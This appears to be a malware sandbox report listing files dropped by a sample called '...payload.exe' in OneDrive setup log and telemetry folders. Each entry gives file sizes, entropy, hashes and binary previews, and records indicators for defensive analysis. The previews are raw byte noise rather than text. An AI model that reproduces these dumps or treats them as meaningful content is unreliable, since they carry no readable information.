                                                                                                                          Preview:1.0./.6..s..{/....wC...Z..C....(... AL9H]E.h6....eG...S..v6..P%.\...\e.......@!.,HT......R.M$.`....../.F.L.RAz.;S...&=.....{.j.(.......h_..."...3.k<X..#..k....u..{.@.0P9.....:^...V...o...x:.... I?.>...L.&P.... ..d............#..%...[;.}...."..c...?.]j...X$_\..5..< .....$.......el.0...seK`.57..N%S........O.ti-.d.AjT.|)...}..q`...Bp.]zN.j.....@....P..S...7b..<5...}...7.I........=.s.x.QG...0;...b...u...73+t...NF.YC.?....... Oe.e_.X..1mS...BX...............t.F.....c]..\o..P..6....:.......mj.C...#\.....9._.....O.I..D..A.s...#.C...>....Z.W6LAg4./...[>.K........7...tT...,4z.=Y.2.d(p=#.........F.<..}.|a.OR....J.?O.H.E..%[_.V*UMV..+=AJ..0.<...KS.6?Oa.,.....K..3u".sK-.6..t}4J.G...Q....{IP...T.;......_...-...a.3.#u{n..f.,...n....?nDb...?...o.j:...gTb..U..V.8.G.".}..+:..I~.t..{.3.X._...N4#....J.P.R.t...[bs..^.K.....:....C....Is .N...._Cu.F%.`.=$xm%H.......~..kN4..........\.V7.....,.4..f...A....l..WB..5.8.....B.......z.1.N...'..I.A.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115204_7008-7012.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.5740352680590343
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:wK7vyOuqTuanioOresASA9fMVKWHE9gvQpqVOGrRR2/bKa+uWqQ6z:wK7vy4TFioOreMZk98QpqVf32/+zy
                                                                                                                          MD5:F35B635B6BC6DA9C2902FD60FE3FB181
                                                                                                                          SHA1:7EC8D37379925C44AC411C0511935EDC1E4E91F5
                                                                                                                          SHA-256:45C5B84E26FB4847674B40D9A223F366C799804C2C974F4FA710192DCC0F93A5
                                                                                                                          SHA-512:EDE2A4014D3724034C3CA42F0B4D868DB3C0E831CF49A18207BADD0C072C734E44E3D6EFF35C9EBCB326F9537C78A63E9B5C44AFB44CD7135520BC6A3703685D
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./a.>u..M.b5.....>....\.....<..E.X....h..V...9x.pg...u.u...._>.gw..........."J>..c.G.iV......nS.=..,....U:.....5..p'E.M..pY..m..g..+.....{L'\lb4..........Sn1...[..3.....<... ....\.}...r.W.U&...?.k....U.=.....(%..K..AC.... ..a.frs*v5N~.,......C.&.r.#A<,.2.C!..p".`CfJ..D.%Sv...d....0..X&...Zl...l8y.....X.n.4~...x.j-..._.. ...m.R.cs'.NT.4>..<'.r.e...C..Md.P.0^..w..R......xwD.R.a....|w.y.......$..V.J.&l.N..p..ot&..lt..)..a...:K..P..A.`.8.../..43...%..Irh6i.t%e6....l..........Bg.*.....T*.........."....~y.nQ..h.U#$./.-,...l..+M5....rk....gL..G...6.V.....F.P...&..^.R.v.+....6..l..0..w%R..P...8l..JF..F._..t_?.o.\..s..'.&....+7.........].D.a...n..x.2..G..P.tj.t..........n~j....7.\=.I..`.>Z.t..G...?......|]....v...<S..&...>>..[.@.l...q2..%.G.g...H,..e..........B.......!680x.s.i.eCo.<..c.GD........(Ls.....B.E.w..Y.....7...C..y....@..._f.<.[......:~gd.C.~...-..^u...<dx{.+E.v...D..S..O....Z.......j....|h.aGK/ct.z.R..Ks....1...........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115740_6260-6264.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.5737221308760561
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:G7FuZFO7cc67c42ApILFlIIq0BmaAs1tH:G4ZYO4061ZA6
                                                                                                                          MD5:B9CE54F6BC0980CBCE99469BF1DBE3EB
                                                                                                                          SHA1:B44A401495258CE605C96F51D621D614193C4E05
                                                                                                                          SHA-256:EA1639EF9D55B73FBE795E5AFB24ACF166BA950D651BAD5957A949BCB06DF431
                                                                                                                          SHA-512:2D0636805AE4858E3E05ADDB98F40A7195DC977DFDF1ABF5DD05A9620A2548F010D2F9A7716BD1C682960062619B48C9E38ACA8EACAE2D4E83D8CF6735156F6D
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./..Yx....BY.u.&.=K..<..`7../@.8-Y.....s`.VN...A...1.0 Mp.H&....s..m~...k!p.=;...&.Y.Z7n.....z.....%.2..Q.J...J4......)....b/.._.....*.J:..s..*........U../c...I.Tx.......1.V5.Z.O+.]..Y&....5i..d..OTC..J3..e........,.....n.si[..U.......fV.~..34....++..B.Ie..1...g.m..._...)...#......X\.yS.<.....f..\v#YI...;.....kS..a:.......jM.....>.b..2...*........7...U.".~LF..".E....|t.0....f.2.t?..e.] )..h.9_[".5\......]|.,..w....C.p..p......$..X.(z....+=9....*....R.&H...1.oD$jS.U../.!...s.S........Z..Ks\..:..I_o.4M....{9.s."p...1l[...L!..JbW.E.M..`p.x.@.A.}.R.......a.$.............[..~.~...7HXB4........ ....v^.....o.(......3.@8-.......i..uy.X_..?...m......B`zw.B........Bj..!...w......#m.W3.:L...$....8c...$>.yzR.!q=....7.#./}.K5.......(...>.R.....x@.SBO.8.3...W4.u.{d2..?........t93.Y,....T~...H2..d...B.~..f].++o.-5E^a4...|.x7.v83..2.J..x..x.Y.od..............?..f.e.x(.^C..C><q..qp..P.3........*S.H..4]..H;o..]?..+.+9.w0..C........C.FA...;.E...tC....jAX.(.F..}.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121144_6972-6976.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):2.725581811879915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:EZgl+5Ynzj0IPjoPtaa6OA7IspDHDlvoMFgU2TSh:egl+5YzYIutaazSFll2+h
                                                                                                                          MD5:CCC78C33208D3CC0FCA0869001E9A1A7
                                                                                                                          SHA1:745004CAB837DB0E21BE90CA56D14DDE7ED5F2D7
                                                                                                                          SHA-256:92EE87FEED080E33FC138B4E789ECBB17A261829F7B503FCCD84B3D5AFD7708E
                                                                                                                          SHA-512:BE185C2F692F7277C00EB0FAF91DB0353FCC74FF6452B92E33FCDD3AB5B95989B58E5BC855D370F06B0A364E971ED544FF55869754FBBE49E2558473B88517B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./..e.fo}..E..K^....Wk.7...t..J..7...>5.p^.,.5.....l..Q.F8....D.o......_Mc.#z...5O.k.vga....FX.Qp<,..!-....&E4n\.P ."...8.p83<..L.R.b.[..q.4..!..~f..~...z..fw+?(.ASe.K:.^($...........,...:.25..e..v..O...3...:L....5}...X.is._4.F..m.......u@......AmV.8....OG0......~D_.R:.}"...*1&o...-%.....|.=.z.-......[p.....E/.m,....*.K`.f.s..88.3.i..n.r.&...2.....`%....3q0x=.."..u.U.n#.=..".b......X.....p;.C.WN.|-...s.......TQ.%k.H<r.U...?I._........3m..IT.KQ%.........I.....zOkL..x.#....Hu..y.*<...3UIkF.M..?.,..t...x.~....rJM..D..)...@..$.|R;....4.2.cE...H....?....K.f....8P..l'.of. g-Es..{.$..~.DY.Qu....nP'X.U|....8...E..U..v}H.....x..n.pIL.{.l.C.....\.Ma.....|...f.MA....^..Q...[.......\=.....(wQ..k...\...z.......w-.IKJ&...B..K!..-...9.p.)j..R.R.q..{..@P.C..p....E$K.C.....$.w..E.....p.tn..(.K...{nvm_.Sk.....t......'.bg{9.......A.".p.F ..];M..2..S...G..UM..6..8y..j.2...!.t.#.T.../..J.l.O.|.h....p6.YPD/<.....>.C.....>Y....i...YeQ......;......F.#.....K..D...[]...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121212_7980-7984.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):2.601213086215874
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:+OI0hoLx2DdfX6y4fFGf0vX8Jd46Tlp3r+RjJk:+Ou2hP6ysFGf0Pud44lpCtJ
                                                                                                                          MD5:B19C9E9CFF17EC4A533B399FDE66BD0A
                                                                                                                          SHA1:1DF1D12B1C50906FFCDAB23DDED55D9069C98D12
                                                                                                                          SHA-256:6A84C610C2187C6AB1F1E68E86A1E2D564672ED003E1850AF50ECD1F32362ECB
                                                                                                                          SHA-512:88F5FCF1F7A8DC1582323E74FD668B31C52FC27DC86DE506FF7B1E2E791D34E0EC9AC2935E5F8A54FF5A5C25D70063A9B3F3A51E31099F3630BF5888C32D4711
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./..s..5...b>.#..%.....T3...b......s....d......jA.......Z..p..._...h.9....`..6wM.|...|H..c.w=.....p..Cb&......G.bA%E\tOUTRG.K..q!""......z.58.b......0A..k..C+...&}k.x....G...6.c...V..Z..V.f.C.8..I.&@.z..d....t..;...!...F.)......{.q#.r.>..Ao.....{..Y.>...>-..xq.A.Y..n..DO..7..%m.......(W.P2.Z}Ho...`......L.Y..c..>.r.Z...D{nh........F...X.5..a...x....}...h..i.| ...E9.n...V.".?.F..M.nD.W.}.d`....g;..../..$.Y....Y..`....^ ..q.p..d..w..HOtZ..1`.%x..........h.A..QtpbU...F.hG..v.3.\sP..x.w>/.s..M.".............C....f.>@P.$baHk...........W....=.]....\R\G.,..g._....B..#.O..&K.nI.3..u.ye..4|j...y..>a.y.,!..|.</...D.E+X.(....Oi.q.?&...JPL.b.-.a..........7qD.r.h.+..=.#....tJ....'..g...K b..Q.$Ft98.7..W../.A..Q0..O..5Bi....i..#....R&..sN..8p..gF.0...%...&...0.~LW;.`.B^....d..d..i...4h.....`...n.b.dP?;.;Pkw5.E....2...k..^-..3..,q..Z..Lu..i.z.5.1..#H[.".l.;.!...s..."...@.+.......dt...-a......us..=.........i....`..O.....3e..M.-......C...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_082907_5964-5996.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):2.3777998485733525
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:spSfGXUelK3n0nknZyhaKsXxXgKV2t0BAs95QAI1i1eWjRZaoF:spSc23YkZyhaKkxXgKVpdQ71Qjh
                                                                                                                          MD5:C18C8E4A138D7D2563B1CCE5DB7AF944
                                                                                                                          SHA1:8D28BA704E5923EB25FFFE077C4981C4A575FB49
                                                                                                                          SHA-256:95D4DF0A909C5E1596CFF049DBE4F4A078BDF43514AB6680DEEECF994E398548
                                                                                                                          SHA-512:6BED65B1873E1DF7BC680173A8F809A6F2EE90BF54304A76EF6D3EBD28EB3FD5C37F6D65F6252FA811400610E78311082D7124920FF21DBC9CC468C616C88960
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./..:sD(W-.....t...V.Yr..".w.f.....}K.Qj.,J.K.q@...f.$...{.z.../.v.c....37..f..4yi#$..`p.s..o.S..vx.<=d>F&Z..L...ZLk...]7-.'.h.5[._f......d/6..(........ ..'o.T..Dq..Z~.\.,)...e...|..a3...h...e(j.4+.+..6.2H9...N...%......b.f.6....Db=.U.9t.>A@......2..........P.+.r...%r$0.'..c..".E u1.Y.ZJ(f....~...hz.<.vWW............m.$.+.y...c$.3...)...B@....Mu.Z._.,..@.U1...;(i..k..0Kj.R.A..J6.Qc...?.k...O..=....>..r..1/......i'.............h.Uf..YZv.C.z...:ux.<s..x..N.M.T.....ozv.......Hn.......f.:..(.U..M.v.&..J.M1....X6Jb.;..-$t.b].....:...p<t.../..}..........F>......a...l.x..Ml.............~z...........fN4...>G0..B..Z.|.0W.N.-A....l.....O..D_pzeoR.'...N...D.a..x...t...Q..DQW..n....(.U_.......5..`8..|.*..b......CNm..H.:;...2.z,6....Z.....Zq../X..!.}...`:_h......]....Xa...Q...F..WJI.Vg.b..kS|.5......zq.*.M...#...x..d|"c..........o.U..z..2&.+...nJ.Q.._Eq.....0..i...r..p+...6........v..X.#u...v3..K....GsO.7z|~.I0<.0....C.{).;... Uw..f..2.V(#j{....=#

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083412_6972-6976.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):1.2020803476682547
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:uV0rpnU1EsNrZw+5Hk3YhgfAtqbbzY1QK:uixsNlw+l4YhJtqbHx
                                                                                                                          MD5:D728C2A43F4532088831576F13F2799F
                                                                                                                          SHA1:79D9EED60FC92CD59CACA019E9F55CF870831428
                                                                                                                          SHA-256:DBBE141FEA8285D88304F9A25E8A270A0B2E23E207292CAA5990AFEDAE780281
                                                                                                                          SHA-512:C8CCA11FACDE74C1BD8BBE35C5387DB14DB6EEDD52ED2E1BEBA2100ECD11D1967D7890E1A63CD5A3A5AA8D76E4517415ACB05E4A461FA28F0A160C1EA6805329
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./..z.y'.].... .....D.%.P:.'S.i.jG..VH........h.esk#.%....zgh.W76Q9.R'.t6.[YO'7..c.5v.Z_87./.....AN...Y...z...iI...P.h.......O...v..0.W.(P..X,..@._..!k.B.m...y. .....#hE.<..s......&..3...0.a<...s....P{9.;x.5.i.NO.4...Y...^%........,$.zz..3#i)..K...`.4/A..F.ET.<.(.=u...L..)..(QaCu7.z..]8K9O..U`.=.I[..P...2<..$......{Q..J.......K.r\H[...c...p....g.(..."]+J>|.k...`.0.\.n.Dgc....j..%.]G".........[..W..W..^..^...X..-.V.O..H;.....Bru....^.Yr'Y).8.[t........N..L......S..+t..6..."^......QC.....xf..kg.]bcR.Y.P..[.P_ .&:....p.o.2...5f........gZ\..m......7..+..h.{..$..^=T\L.....ET......,....7M...c..LQf..2O5......bH.V..s7...he...9...8*.....-.[O*.F..u....Z!I...U6...}.......r.Z.!:..+...<.Y..@..2...:Y..r.....M<.r...0.wu...s\&1..p..........+r...5.gyU....}82.L<......+....z..W.%k7.%.F"K.7.t ^.......^..\.ki.?&.....41..l.aK.dC.;o.......r....S6..x.}..P...dCO..lO&m..V....@....q.c...L...^wK....?..v.)..F.DX6:....#'A#r.:C........]....";sFZ...)........|....!A.Y:.....,.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083652_5268-4940.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):1.763349443642783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:EnXXMT2egrGy5HjZ/a8VEqODvGpjE5Bz3k0d1TopTSYdTaQbJ97170f8s:EnHMT21ii3E9Tg0dNM2Qlj4f3
                                                                                                                          MD5:2B182CE8F6FD315DF04AEB7BEA97D4A5
                                                                                                                          SHA1:1B7B08EDC09B6F1F155774B369E5E38F2B3652DD
                                                                                                                          SHA-256:2E482E4B492653FFBF9513DB25BBF6818D0DF3C93887AE5001A3750FFA4B0D73
                                                                                                                          SHA-512:B87127991C181DA3DF620E904B64E78BCB98BD75D3988A345DC0232867F20C2F681E8887F9599E2D38A54831D326EB74961B56EB079581D7B7CE6D13CF9EB5B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./.,*I.....`N...: 9...Rf.....1....R.d......L.....e../.K.$.p1W.H..x'q|..b.....T.90.G7..5..@.@..H...7.....^.<.R?...s5.....}a.y....._'2....Ew@...9)...k.......|.l....&D....._Pg#..`wp..D!~.[T8...S........./.F,..q..4)....g. ...<...#.$.DKwv]8.P........~:.@..!..Wx.z2.w...T..Yb..&c.....J.g...7J$..P..8T.w......4.k..Yz/.U.n...H..~....!T.....C..:.Ey.6...|~m.,.n.;2z..^L?.XT5NE9... ...o,..Hn.%.U...Qs.vP.r1.WTp\.e|..z.$...<.5X.c.~..QLl..W:.....E...7-.p_.>.|`w~|...m..I~..[...I.+.N.3@.6H?...n..........ge...H}.h...'.q9...5.Z..%...^.d.1..}.k-'k.yj4o%...eH..}i.y..|..D[e*.<...f(d..s........D..X.4.g..W....;v.;...P."..K..Y....7..c:ss.\...<-?...h.S...z...P.#............R,...6.F.K..2@....Pn_AtF.5M.M9.Fstf.xdI.Ww.\.....|.\W!.P.v6....]j....Pr..Q$.@..x...A_.45.8..:..?`...1.$.....=.n.0.<.d-.}.|r.....z..c.,Lg.........glH.lE.HR...Z..$5..O..h0(:N....H......|.8...n..r.....[..:..+._[y-c.\.E3.\.d35,.k..1:....."9.e.......0.._.r......1....3R.T.x.A.).Hb./. .p.....j.R

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\machineTelemetryCache.otc.session

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):3.4268769973394115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:805irWJv4r+c5GtDf1Dw67K96uM+s23e90UqpS4KTBdJxPP/:J56+cwxf1DxK0+sQPiPxH/
                                                                                                                          MD5:04C38783BC679A8FD083978DF2456774
                                                                                                                          SHA1:F65F357A7BF270292D5C7E18E7ED37FD529673E9
                                                                                                                          SHA-256:8F6316F5856739FBABC38C344DCAB5619E2F1B6F51A77F0F76B6EF45E9565987
                                                                                                                          SHA-512:8CE2173B23AD40DC37D54F552FDC38A9EDE2709C8112B6D776479026AF58355BA243F5AE3A397E006A66BB130DDE1028724D77C46EF029BE51D7109961EB496F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLit]d(....Q.S.s.]......"D.-R.........zi..e..$A.:s.`...s. m......OpLN#yF.6..TSjQ...O.tWj./.O.g.7..........7Xl :..2..~7y](.5...-..$3h]....;P0.>..]..K.Iq.s.N.3x...S3B..M..{......R...Ju.....}r.....~.....pS......c...o..#i....d.(.....g.D..BvZ{1.1.H.v..1..'.....O..G.o.7.B..$...?..&.R...r.8n..y.u..'.....3..1....iC.M.e.l.P...}.X...Q.X...]~R...3...L...J.......:.....9...a...-....[qlC..R..tC..i...b..._.a..q.Z..+.X.j\#..E.....Wt...'....E..h0i...y..A+......k.|...<..MtD]I..^p...v....NH....,..^...f. ...?5yzc..!...u ...G3".6...8...0..a.C..o.@4........b<.....%...o....a........a...0[..=.RH%...>V.9L.v..)....-.>.@....=n...w.y.u...\...L.....va......k.xF..f(...L....... ..o$.+HR...8......4...E./.L.C)P;.L .O.B(.`-.......X#%.S\J .......]..%&.]-Q.K.K..e_..G.Tg.l..4...~.r...(\.r;].5.. rF.c..0l...>.WV......./.O;....y...n...[+..}.:\.G`.3.,S.`\.....av..N..b.OFeA..,@a....u........A.2..<...q...]\.......ly.E|'.@.+6..l...~.=...l..h.s.0....V.!..n.T.oiQ....C.I.&,..|.ux

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):3.423926717612423
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ZazvTk7CjlZP+zETOgofC1ovEQRR45ujGtYO1Ze3RiCofcR+tz0e7P:ZaICjlZP3FHFQ0UjGtYMznfcRE
                                                                                                                          MD5:D39E31A8EBC5C58E854231A9A84A84A0
                                                                                                                          SHA1:CFC528BAF8B7BDDE7AFEBEC8F234EC11FDA51846
                                                                                                                          SHA-256:0173D60266E7C416BCEB547B42E52C88A33FEE9A30C21EC57C2355DA224DBB85
                                                                                                                          SHA-512:C82D4BCD1FD8B456D3886EBC1A07158CF3F64BB5615EA72BAADDCF1BEE78C73EC23A8B1F61A14F439B32062C7AE3B6AE257953ACE249802E89EDF9C89539DA2E
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLit.M|..dB .....B.J..7..u&j.....~......Fg..[y......]...fP!fh....q3.6...c.yn...>....}.e.e.s.$K$.........L.?..^..E.O.D.H.:G_.....2............U.5.....AE.<...,\X.._\$.Rq]..WO..dATiR2....jE.?../*.N...b.x63"=..Gq.L..@.'Uw...h-ey.P...'8.....0$..xf....~1..j..y..ma...F.M....+^..>t4.`..6t......D/C....~.Oz......3u..t....fH....i.%.w.....6@.Y...,...{..%xm..l2...O..${..r$y...n.<Q.(.b..2.i.R..5..9Yz|..'p..N,.M>..;...D..ZX.q._.e..w.I.F.o...,Fs.K.M........V..6..g.>.]......XE./.... Ce...5F.?.Y..........x.d..|{.x.....{@.J.,7.3..T.n....Zhq|tHI.Nndt..]....za.9....j....^-.j.....j...."L.y..i.......Y+.m."7f.......M./..8.<.x.i....2..!1Sl=X.7.S.y...c6+......qv......U84.... }....Km&.5....f.o..@....!.......-.n@...+R kI...i0.f..-4.. (...ve.[j~|....H6".G.6....Ns9.L........q.R.\..`.>.7S>.....k?P..../$.[J...IV|.Y..p............EF.obg.......}AvZ....=of....&.yU.g]..w.d....".m....$.....u.&...p.,.U.(..K]'..8.>...*....V...<.|...8...}~li...ppN"wp... ...|...;......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3211264
                                                                                                                          Entropy (8bit):0.6633685833713703
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:iYQmxeed7mxuYG9L1uwyGLYbMPYyRVkGT/dH6GBrWn1GKi7Ytu8MAoL:iEfQxc9LFxIwFTx6ua1bJtu1
                                                                                                                          MD5:8A23D7C38B490AECE7DF85A434B33D76
                                                                                                                          SHA1:18E05D3E43050B25007AA6638A20ED3FEFCB70F6
                                                                                                                          SHA-256:86A361552934D020E9A415AB44347D80D1BF1C07A7C000E15E0189F4A8F33D01
                                                                                                                          SHA-512:93297412D78E3F06A05F73DA700DE9A6EA87DF725C8D4798E8E35924441F76BC9968BAD11CF95A047C9A17873600793ACDC728CF94B85240AF9378F2CFC75F87
                                                                                                                          Malicious:false
                                                                                                                          Preview:1G.f..zwa.0..I...]z...A.,Dk.=.....*...^..8..|..\...|.$.3.F. ...Im7%2....j..uwx~..Y.....Z...."BOS.a...[..%.>6.+52.M..a.p.i....."....Z..*K..M..I.S.>LH|+.*.d,...8;.......@.S.g..^.@5.06.d..H.F..C.tH. j.T.^~.'.*...YE.i....b;at..e.m.....Nu........5....W.8'...3#y.0m.T...h?...u.._......FWt.D.OD...6...dT.s.q;....b.XSj....8-.p.PwP..L...W..h...;O.{t....';.e,~.ZC%.....)...z..K&`...P.\.... j...Ar.kr.v...r.=.......4.>Y....Ta..~Qt..t0.#...|. .Yle...=.oJ...SE9...aod.U....q.D.._kY..f....wP.r5]..,#..Tw.!.`n.0_.D....Ck...mn.../b....:4..`?.G..!...L.S..D:_x...L.~&\~...uJ../..cO.. xU=&..VS*&q.\..~.rw..;.^.MM.{..C..u... ..:........L...k`.[.:'....;..})*&.y%.#.s(.......?....s..c..~F...he...&..)Jp;.8.B......'....^...]n.....Z.&...........1r..x.T._......R.*.W..i.i..Z.9...?x.....Th.....N..td.c.^..&..$.a.......V<Nj...<.8u..U7TS....)..Z!H=U..27*.a..\)....I...........6?.e..C.D*..[(.....8C...;..........>.|....0%s..T|...X.|.9....+.w._.E.'qxD]&.(...D..\..I@.lF.0.v.`.gy.N

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):3.425689004332776
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:KS4yY+dIBG0ShIqjy4IE4KBPGVbKiHQtcTMsy65OAyZk4ebg4MI:KZB5SaqnIEeVuMQ5Bteb5
                                                                                                                          MD5:8D8853DAD06E5252B96E997E83E3BB73
                                                                                                                          SHA1:F2644C1A781008A87F50D852F9200C627E963173
                                                                                                                          SHA-256:454325E54519FBE0B36AB9ED250144DA3C7B778F41AC5AD9D64AB45A3FC1F6A6
                                                                                                                          SHA-512:E6E43B4F8638C41F3F7E0C5CBB0FEA56EB2DF3C4846813B0E766C6FFCFE32A7C8FF6F06DAE352222FD35E49A9969367368269FC147C50E609E9AE76604CECBF6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLit....."i%.p$....gz.....l..y.)..<..X........Q...N..Uc..N..e.q...N...8..%{...;...1Ti.;vS....Ks.....=d4l.....G.%.h....,0...[...j._u>..C.84n.I....E.R{.+./.}....9?..&.2R.-.m`....X..*:.3.S..7...-P.....*.....C,..8..J.L..(.g...@X..>.jiA.?.%........l.@i.C.2..~...f#%..S..v.w%...H..x.|.oY4.v.-;!..K$`..S,B.U.;- .WA.5.JG....m.0E..I..K../.....x=...b....M0!8E...p..g...!&....C.....lm8.G...G..g....Z.=....6...A..(...h=.K....zb.3I.|..Q...O...".L.}..!5............9..c.Xui6.-...<....Gd.Y.i3....)...c....".k....zNU...y.....E.A...>...w.(]-.ad.MJ....x..N@S..3.......61p.x.[...l.)9k.6.......Et..Y..n...#U....-...z.z'...[.g:5.~K.....L............l....x'.J..D..IK........RF...v.......=.Jds.gi..$.&Z..0...-..(..f.Y...e(.v...2j.)S..B^).....$Gj.+.......p."#..>e..2dF...S..w..Y..ee~#@....i......K..x..u...H.b..B.D....g../..m..zG..bd.....(..........v%....S.........B....e.&P.%%HY'......I..:.h.5.L..ybs.aS.I.........8.e.9C....6Lh...T{.L..G.G6E{..iW.[.#.'6...A@-..S.c..nd...R.=..v

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1353
                                                                                                                          Entropy (8bit):7.847756433266105
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YnqX/+oxrlBGbdJElGvjQ3uhL1Bkukit56wxUmNwqQFfRFlkEceodbD:YnU+uxBGbXZv8ehL1BkFK5lx9jKF+D
                                                                                                                          MD5:B20A8F8050191CD224BE20793C47D6F7
                                                                                                                          SHA1:EEBD0B1D7447F6A3F5F39A39456A8DEE15FD201F
                                                                                                                          SHA-256:C4ECFFA1C402AE98A457A4572CCD274F111D0EEE4FBB4303FB40909461433130
                                                                                                                          SHA-512:01B27F9B9F8F0E7806985B702ADEB5AE1023C95868025A0F623E112F507F13596F81A1E02A90CE555B2D76D9ED16B7A3FB9ECEC9924DC1104AD9D1F033CF2D90
                                                                                                                          Malicious:false
